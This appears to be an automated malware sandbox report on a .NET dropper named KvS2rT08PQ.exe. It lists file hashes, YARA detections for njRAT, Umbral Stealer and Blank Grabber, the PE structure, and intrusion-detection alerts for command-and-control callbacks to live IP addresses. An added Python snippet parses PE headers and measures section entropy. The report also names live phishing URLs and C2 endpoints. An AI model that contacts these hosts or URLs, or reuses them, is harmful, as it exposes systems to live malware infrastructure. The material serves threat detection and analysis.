TUT-AS (US) | SecuriteInfo.com.Win32.PWSX-gen.25825.12964.exe | malicious | AgentTesla | 208.95.112.1
TUT-AS (US) | SecuriteInfo.com.Win32.SuspectCrc.28876.20318.xlsx | malicious | AgentTesla | 208.95.112.1
TUT-AS (US) | T1SEuO2fxi.exe | malicious | Xehook Stealer | 208.95.112.1
TUT-AS (US) | xnNcI6OenKJs.exe | malicious | Quasar | 208.95.112.1
TUT-AS (US) | T1SEuO2fxi.exe | malicious | Xehook Stealer | 208.95.112.1
TUT-AS (US) | rMayNewPurchase.exe | malicious | AgentTesla | 208.95.112.1
TUT-AS (US) | rRECEIPTTRANSFE.exe | malicious | AgentTesla | 208.95.112.1
TUT-AS (US) | charesworh.exe | malicious | AgentTesla | 208.95.112.1
TUT-AS (US) | FAR.N_2430-240009934.exe | malicious | AgentTesla | 208.95.112.1
Match: 3b5074b1b5d032e5620f69f9f700ff0e
Associated Sample Name / URL | Detection | Threat Name | Context
2M1NS61GG8.exe | malicious | LummaC, DarkTortilla, LummaC Stealer, PureLog Stealer, RedLine, zgRAT | 104.26.0.5
Receipt_7814002.exe | malicious | AgentTesla, PureLog Stealer | 104.26.0.5
fP4kybhBWi.exe | malicious | Quasar | 104.26.0.5
VN24A02765.PDF.exe | malicious | AgentTesla | 104.26.0.5
ShippingOrder_ GSHS2400052.exe | malicious | AgentTesla, PureLog Stealer, zgRAT | 104.26.0.5
SecuriteInfo.com.Win32.PWSX-gen.25825.12964.exe | malicious | AgentTesla | 104.26.0.5
0OqTUkeaoD.exe | malicious | RedLine | 104.26.0.5
IMG_210112052.exe | malicious | AgentTesla, PureLog Stealer | 104.26.0.5
https://keenetownhall-my.sharepoint.com/:b:/g/personal/amanda_keenetownhall_org/ESKbqbSIMj5ElsbdsfaEg7oBgkFm5H_JqS97uaySzVhJDQ?e=KMMz4y | malicious | HTMLPhisher | 104.26.0.5
https://www.canva.com/design/DAGC4eUhMw0/cKr_ImwjL8JW0nUMNMi5QA/view?utm_content=DAGC4eUhMw0&utm_campaign=designshare&utm_medium=link&utm_source=editor | malicious | Unknown | 104.26.0.5

No context
Process: C:\Users\user\Desktop\KvS2rT08PQ.exe
File Type: CSV text
Category: dropped
Size (bytes): 654
Entropy (8bit): 5.380476433908377
Encrypted: false
SSDEEP: 12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
MD5: 30E4BDFC34907D0E4D11152CAEBE27FA
SHA1: 825402D6B151041BA01C5117387228EC9B7168BF
SHA-256: A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
SHA-512: 89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
Malicious: false
Reputation: moderate, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

Process: C:\Users\user\AppData\Local\Temp\Umbral.exe
File Type: CSV text
Category: dropped
Size (bytes): 1492
Entropy (8bit): 5.3787668257697945
Encrypted: false
SSDEEP: 24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhwE4ksKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6owHptHTHf
MD5: 761D1106534DF52590D691CAD8962C57
SHA1: D3678D8F8635FF85D354F7EE2FFC24008357DC5B
SHA-256: 73784F8EEA9F790E13C7DA5137D0735B161D974DE8F748ABFD4A3951CE91FAB2
SHA-512: AA3595F2936C95C599C6E8C2784CA18FDC7DE34F290D38B56FCC52D82CDCBF002EAE0BB16DD6355DC8AD85F6DCC69246FD3D07274A49C9914F4769F256BA16ED
Malicious: false
Reputation: moderate, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System

Process: C:\Users\user\Desktop\KvS2rT08PQ.exe
File Type: PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 2581504
Entropy (8bit): 7.846145477617643
Encrypted: false
SSDEEP: 49152:erEG28A6+EsLdcMobsUobQieITYbNbNWo4kSH3OqtwInxBmew+W7SC:l89qpcMwsUwQieIT4bNJFY3OqtD2
MD5: 33EB68C8C4FC521D64ED82219CDB19F2
SHA1: 2D114152924EA141DF11082D6F337BF7E9A81035
SHA-256: 24251C6105A1F345DBB16860C2405647127B8B03E03B0D0C1C61F896A6C7B7B0
SHA-512: 0B5090DBB977AC8B79B01A3D33C26592A7B98BD9461212F70FA3C092B359C93AD22C1C4BACE3AACC22C74884B154989BE2A724EDF74EFD20EF80DEE78AC75F8A
Malicious: true
Yara Hits:
• Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe, Author: Joe Security
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 50%
• Antivirus: Virustotal, Detection: 65%

Process: C:\Users\user\Desktop\KvS2rT08PQ.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 236544
Entropy (8bit): 6.0804586306351585
Encrypted: false
SSDEEP: 6144:xloZMkrIkd8g+EtXHkv/iD4WRxg2U7X8qtoGnnG4ib8e1mVzWi:DoZrL+EP8WRxg2U7X8qtoGnnGPYn
MD5: 774FA31E76AF56BBAD395E1E3AC68721
SHA1: FE65C14179B2CF0CBD44758578CF878D7DCEF879
SHA-256: 944C19F992F5301AC8936DCDBD4EFB59FBC4F47DCDCC39A77B5E87B4EFFD27F4
SHA-512: 529BA2A356BF4FB3D4820C0DA1DCA58D1583AE37188E61300190D543144140F0F73072A9FAF195DC214A13AC8C365354E2AB212A24646A332085481F47DE8C7E
Malicious: true
Yara Hits:
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\Umbral.exe, Author: Joe Security
• Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: C:\Users\user\AppData\Local\Temp\Umbral.exe, Author: Joe Security
• Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: C:\Users\user\AppData\Local\Temp\Umbral.exe, Author: ditekSHen
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 88%
• Antivirus: Virustotal, Detection: 70%

Process: C:\Users\user\Desktop\KvS2rT08PQ.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 95232
Entropy (8bit): 5.564497749908184
Encrypted: false
SSDEEP: 1536:PlwC+xhUa9urgOBPmNvM4jEwzGi1dD5DR0gS:PlmUa9urgOkdGi1dl7
MD5: 3071F4F7B11A6BF6C623E83EED6D2418
SHA1: 37FD78D1296659109F2C94C9C750B5A98D158F11
SHA-256: 508BCD1A6B7ED82E60873EB1B035647EC9F8F9FACDF65D6D6A73B8EF37D5BB9E
SHA-512: E6BC32A3C955F80A9A54C261722F49032C1F32C50F98F0792AF85769B87B4E9EF16EE4FD4F1E9E0A991E6F9311D54DB99737401E6B5F32B503531E6859AD45B8
Malicious: true
Yara Hits:
• Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: Joe Security
• Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: unknown
• Rule: CN_disclosed_20180208_c, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: Florian Roth
• Rule: Njrat, Description: detect njRAT in memory, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: JPCERT/CC Incident Response Group
• Rule: MALWARE_Win_NjRAT, Description: Detects NjRAT / Bladabindi, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: ditekSHen
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 100%
• Antivirus: Virustotal, Detection: 77%

Process: C:\Users\user\AppData\Local\Temp\svchost.exe
File Type: Unicode text, UTF-8 (with BOM) text, with no line terminators
Category: dropped
Size (bytes): 5
Entropy (8bit): 2.321928094887362
Encrypted: false
SSDEEP: 3:m:m
MD5: 53CE6D1AE8885B5D12E654469F456C83
SHA1: 9D8B30C523DDEF4D24134072B27716BEC7D94D6F
SHA-256: D7EBF92AD6E3BC44FBC3CFBB234EF4AFAFD7EA339F712229641A2849B6F87CE2
SHA-512: C15DF9281E9CCBB8D30E24E751B77A030E734F8CDA4BD9482D3CA02F6B23E463A8E90DDD78A582CA059E57B8D0492C22583D792BC7368094FFC06E12CD145D9D
Malicious: false
Preview: .20

Process: C:\Windows\SysWOW64\netsh.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 313
Entropy (8bit): 4.971939296804078
Encrypted: false
SSDEEP: 6:/ojfKsUTGN8Ypox42k9L+DbGMKeQE+vigqAZs2E+AYeDPO+Yswyha:wjPIGNrkHk9iaeIM6ADDPOHyha
MD5: 689E2126A85BF55121488295EE068FA1
SHA1: 09BAAA253A49D80C18326DFBCA106551EBF22DD6
SHA-256: D968A966EF474068E41256321F77807A042F1965744633D37A203A705662EC25
SHA-512: C3736A8FC7E6573FA1B26FE6A901C05EE85C55A4A276F8F569D9EADC9A58BEC507D1BB90DBF9EA62AE79A6783178C69304187D6B90441D82E46F5F56172B5C5C
Malicious: false
Preview: ..IMPORTANT: Command executed successfully...However, "netsh firewall" is deprecated;..use "netsh advfirewall firewall" instead...For more information on using "netsh advfirewall firewall" commands..instead of "netsh firewall", see KB article 947709..at https://go.microsoft.com/fwlink/?linkid=121488 .....Ok.....

File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.998369385258011
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name: KvS2rT08PQ.exe
File size: 2'447'360 bytes
MD5: 2784277bd68152abf75c6c6d59fab7af
SHA1: e1d047c97e3bdfe273b215b42eccde32ca2ca63f
SHA256: 737bba8d3e9ad3e1526bf5949962af3b37107c80c767c473a820999eae507fbc
SHA512: e05b8251c9f6c59c7901d72c58f5b8c35dc376068368e67f81ee79da4287ddfc25c6ca5893d87944ed21c592bdd62f57d40a9f78c9af56762f33b010dd10b62c
SSDEEP: 49152:T2Q8G4mSmM8sik/AJ+/GRfzlW+oCZBNKoiYNsVjGMFWm02qG6zSo2:T2VmT8B4JAGllW+DBNdtN811
TLSH: 4DB53310C5E80C26C80FC6FF8D6E729A416EC6CB4D263D3BCC943C95D5A626BA57D728
Icon Hash: a5212996d66b3b9c
Entrypoint: 0x64f4be
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x66106267 [Fri Apr 5 20:43:19 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

Instruction
jmp dword ptr [00402000h]
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x24f468 | 0x53 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x250000 | 0x7dd8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x258000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x24d4c4 | 0x24d600 | e4285a4b56f6f975a60c25f35c4e58f2 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x250000 | 0x7dd8 | 0x7e00 | 30c20d4fb1ed849582819809e0e1103d | False | 0.9612165178571429 | data | 7.918456979217411 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x258000 | 0xc | 0x200 | ea5adef9f74f3b92605254d2925f5f39 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x250130 | 0x7859 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | - | - | 0.980947125839852
RT_GROUP_ICON | 0x25798c | 0x14 | data | - | - | 0.9
RT_VERSION | 0x2579a0 | 0x24c | data | - | - | 0.4744897959183674
RT_MANIFEST | 0x257bec | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | - | - | 0.5469387755102041
DLL | Import
mscoree.dll | _CorExeMain
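The data directory, section and import tables above together read as "managed (.NET) executable carrying an encrypted blob": the only import is mscoree.dll!_CorExeMain, IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR (the CLR runtime header) is populated, and .rsrc scores an entropy of 7.92, which is what packed or encrypted resource payloads look like. The following is an added example, not Joe Sandbox code: a dependency-free PE header walk that reproduces both checks. The struct offsets follow the PE/COFF layout; build_sample_pe() and the SAMPLE_* images are constructed for the demonstration and are assumptions, not the analysed file.

```python
"""Walk a PE header to answer two questions the tables above raise: is this a CLR (.NET)
image, and which sections carry high-entropy (packed or encrypted) data?
Added example, not Joe Sandbox code; the sample image is constructed in build_sample_pe()."""
import math
import struct
from collections import Counter

COM_DESCRIPTOR = 14                      # IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR: CLR runtime header
PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for constant data, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_pe(image: bytes) -> dict:
    """Return the CLR header entry and per-section entropy; raises on a malformed header."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    _machine, nsections, _ts, _symptr, _nsyms, opt_size, _chars = struct.unpack_from("<HHIIIHH", image, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", image, opt)[0]
    if magic == PE32_MAGIC:                      # NumberOfRvaAndSizes / DataDirectory offsets
        ndirs_off, dirs_off = opt + 92, opt + 96
    elif magic == PE32PLUS_MAGIC:
        ndirs_off, dirs_off = opt + 108, opt + 112
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    ndirs = struct.unpack_from("<I", image, ndirs_off)[0]
    dirs = [struct.unpack_from("<II", image, dirs_off + 8 * i) for i in range(ndirs)]
    clr_rva, clr_size = dirs[COM_DESCRIPTOR] if ndirs > COM_DESCRIPTOR else (0, 0)

    sections, sec_off = [], opt + opt_size      # section table follows the optional header
    for i in range(nsections):
        name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", image, sec_off + 40 * i)
        raw = image[raw_ptr:raw_ptr + raw_size]
        sections.append({"name": name.rstrip(b"\0").decode("ascii"), "va": va, "vsize": vsize,
                         "raw_size": raw_size, "entropy": shannon_entropy(raw)})
    return {"is_dotnet": clr_rva != 0 and clr_size != 0, "clr_header": (clr_rva, clr_size),
            "sections": sections}


def high_entropy_sections(image: bytes, threshold: float = 7.0) -> list:
    """Names of sections whose raw bytes look packed or encrypted (the report's .rsrc scores 7.92)."""
    return [s["name"] for s in parse_pe(image)["sections"] if s["entropy"] >= threshold]


def build_sample_pe(rsrc_payload: bytes, dotnet: bool) -> bytes:
    """Constructed PE32 image with .text and .rsrc, laid out like the report's sample (assumption)."""
    headers_size, text_raw = 0x400, b"\0" * 0x200          # zero-filled .text, like the entry stub above
    text_ptr, rsrc_ptr = headers_size, headers_size + len(text_raw)
    dirs = [(0, 0)] * 16
    if dotnet:
        dirs[COM_DESCRIPTOR] = (0x2008, 0x48)              # RVA/size as in the report's data directory
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 96 + 8 * 16, 0x102)
    opt = bytearray(96 + 8 * 16)
    struct.pack_into("<H", opt, 0, PE32_MAGIC)
    struct.pack_into("<I", opt, 16, 0x2000)                # AddressOfEntryPoint
    struct.pack_into("<I", opt, 92, 16)                    # NumberOfRvaAndSizes
    for i, (rva, size) in enumerate(dirs):
        struct.pack_into("<II", opt, 96 + 8 * i, rva, size)
    sec = struct.pack("<8sIIIIIIHHI", b".text", len(text_raw), 0x2000, len(text_raw), text_ptr, 0, 0, 0, 0, 0x60000020)
    sec += struct.pack("<8sIIIIIIHHI", b".rsrc", len(rsrc_payload), 0x250000, len(rsrc_payload), rsrc_ptr, 0, 0, 0, 0, 0x40000040)
    headers = dos + b"PE\0\0" + coff + opt + sec
    return bytes(headers) + b"\0" * (headers_size - len(headers)) + text_raw + rsrc_payload


# Constructed inputs: a uniformly distributed .rsrc (entropy 8.0) beside a constant one.
SAMPLE_DOTNET = build_sample_pe(bytes(range(256)) * 8, dotnet=True)
SAMPLE_NATIVE = build_sample_pe(b"A" * 2048, dotnet=False)

if __name__ == "__main__":
    for label, img in (("dotnet", SAMPLE_DOTNET), ("native", SAMPLE_NATIVE)):
        info = parse_pe(img)
        print(label, "CLR header:", info["is_dotnet"], "high-entropy:", high_entropy_sections(img))
```

On a real file read the bytes with open(path, "rb") and pass them to parse_pe(); the same two signals (a non-empty COM_DESCRIPTOR entry and a near-8.0 .rsrc) are what the report's "Costura Assembly Loader" and "Found many strings related to Crypto-Wallets" findings rest on, since the embedded payloads are only visible after the loader decompresses them.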
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
04/20/24-21:33:31.352663 | TCP | 2033132 | ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) | 49750 | 19177 | 192.168.2.4 | 3.125.209.94
04/20/24-21:35:42.023350 | TCP | 2814860 | ETPRO TROJAN njRAT/Bladabindi CnC Callback (act) | 49758 | 19177 | 192.168.2.4 | 3.125.223.134
04/20/24-21:35:32.786647 | TCP | 2814860 | ETPRO TROJAN njRAT/Bladabindi CnC Callback (act) | 49757 | 19177 | 192.168.2.4 | 3.125.223.134
04/20/24-21:32:07.714188 | TCP | 2825564 | ETPRO TROJAN Generic njRAT/Bladabindi CnC Activity (act) | 49740 | 19177 | 192.168.2.4 | 18.158.249.75
04/20/24-21:33:38.270894 | TCP | 2033132 | ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) | 49751 | 19177 | 192.168.2.4 | 3.125.209.94
04/20/24-21:32:26.030819 | TCP | 2814856 | ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf) | 49747 | 19177 | 192.168.2.4 | 18.158.249.75
04/20/24-21:34:13.358970 | TCP | 2825564 | ETPRO TROJAN Generic njRAT/Bladabindi CnC Activity (act) | 49753 | 19177 | 192.168.2.4 | 3.125.209.94
04/20/24-21:32:02.183024 | TCP | 2033132 | ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) | 49737 | 19177 | 192.168.2.4 | 18.158.249.75
04/20/24-21:32:04.631394 | TCP | 2033132 | ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) | 49740 | 19177 | 192.168.2.4 | 18.158.249.75
04/20/24-21:32:25.822297 | TCP | 2033132 | ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) | 49747 | 19177 | 192.168.2.4 | 18.158.249.75
04/20/24-21:35:55.347737 | TCP | 2033132 | ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) | 49759 | 19177 | 192.168.2.4 | 3.124.142.205
04/20/24-21:32:56.770839 | TCP | 2033132 | ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) | 49749 | 19177 | 192.168.2.4 | 18.158.249.75
04/20/24-21:33:38.479570 | TCP | 2814856 | ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf) | 49751 | 19177 | 192.168.2.4 | 3.125.209.94
04/20/24-21:33:56.027448 | TCP | 2814856 | ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf) | 49752 | 19177 | 192.168.2.4 | 3.125.209.94
04/20/24-21:35:55.555682 | TCP | 2814856 | ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf) | 49759 | 19177 | 192.168.2.4 | 3.124.142.205
04/20/24-21:35:39.113591 | TCP | 2033132 | ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) | 49758 | 19177 | 192.168.2.4 | 3.125.223.134
04/20/24-21:34:08.564113 | TCP | 2814856 | ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf) | 49753 | 19177 | 192.168.2.4 | 3.125.209.94
04/20/24-21:32:04.839656 | TCP | 2814856 | ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf) | 49740 | 19177 | 192.168.2.4 | 18.158.249.75
04/20/24-21:35:55.890076 | TCP | 2825564 | ETPRO TROJAN Generic njRAT/Bladabindi CnC Activity (act) | 49759 | 19177 | 192.168.2.4 | 3.124.142.205
04/20/24-21:33:31.560459 | TCP | 2814856 | ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf) | 49750 | 19177 | 192.168.2.4 | 3.125.209.94
04/20/24-21:36:07.123314 | TCP | 2814856 | ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf) | 49760 | 19177 | 192.168.2.4 | 3.124.142.205
04/20/24-21:34:42.913707 | TCP | 2033132 | ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) | 49754 | 19177 | 192.168.2.4 | 3.125.223.134
04/20/24-21:32:57.578337 | TCP | 2814860 | ETPRO TROJAN njRAT/Bladabindi CnC Callback (act) | 49749 | 19177 | 192.168.2.4 | 18.158.249.75
04/20/24-21:35:20.785425 | TCP | 2033132 | ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) | 49756 | 19177 | 192.168.2.4 | 3.125.223.134
04/20/24-21:35:17.370363 | TCP | 2033132 | ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) | 49755 | 19177 | 192.168.2.4 | 3.125.223.134
04/20/24-21:35:27.123609 | TCP | 2033132 | ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) | 49757 | 19177 | 192.168.2.4 | 3.125.223.134
04/20/24-21:35:55.890076 | TCP | 2814860 | ETPRO TROJAN njRAT/Bladabindi CnC Callback (act) | 49759 | 19177 | 192.168.2.4 | 3.124.142.205
04/20/24-21:34:43.124036 | TCP | 2814856 | ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf) | 49754 | 19177 | 192.168.2.4 | 3.125.223.134
04/20/24-21:36:06.912000 | TCP | 2033132 | ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) | 49760 | 19177 | 192.168.2.4 | 3.124.142.205
04/20/24-21:32:07.714188 | TCP | 2814860 | ETPRO TROJAN njRAT/Bladabindi CnC Callback (act) | 49740 | 19177 | 192.168.2.4 | 18.158.249.75
04/20/24-21:35:17.579185 | TCP | 2814856 | ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf) | 49755 | 19177 | 192.168.2.4 | 3.125.223.134
04/20/24-21:32:57.578337 | TCP | 2825564 | ETPRO TROJAN Generic njRAT/Bladabindi CnC Activity (act) | 49749 | 19177 | 192.168.2.4 | 18.158.249.75
04/20/24-21:35:20.991740 | TCP | 2814856 | ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf) | 49756 | 19177 | 192.168.2.4 | 3.125.223.134
04/20/24-21:35:42.023350 | TCP | 2825564 | ETPRO TROJAN Generic njRAT/Bladabindi CnC Activity (act) | 49758 | 19177 | 192.168.2.4 | 3.125.223.134
04/20/24-21:32:02.391022 | TCP | 2814856 | ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf) | 49737 | 19177 | 192.168.2.4 | 18.158.249.75
04/20/24-21:34:13.358970 | TCP | 2814860 | ETPRO TROJAN njRAT/Bladabindi CnC Callback (act) | 49753 | 19177 | 192.168.2.4 | 3.125.209.94
04/20/24-21:35:27.332080 | TCP | 2814856 | ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf) | 49757 | 19177 | 192.168.2.4 | 3.125.223.134
04/20/24-21:35:32.786647 | TCP | 2825564 | ETPRO TROJAN Generic njRAT/Bladabindi CnC Activity (act) | 49757 | 19177 | 192.168.2.4 | 3.125.223.134
04/20/24-21:32:56.978717 | TCP | 2814856 | ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf) | 49749 | 19177 | 192.168.2.4 | 18.158.249.75
04/20/24-21:33:55.819529 | TCP | 2033132 | ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) | 49752 | 19177 | 192.168.2.4 | 3.125.209.94
04/20/24-21:34:08.350949 | TCP | 2033132 | ET TROJAN Generic njRAT/Bladabindi CnC Activity (ll) | 49753 | 19177 | 192.168.2.4 | 3.125.209.94
04/20/24-21:35:39.323225 | TCP | 2814856 | ETPRO TROJAN njrat ver 0.7d Malware CnC Callback (inf) | 49758 | 19177 | 192.168.2.4 | 3.125.223.134
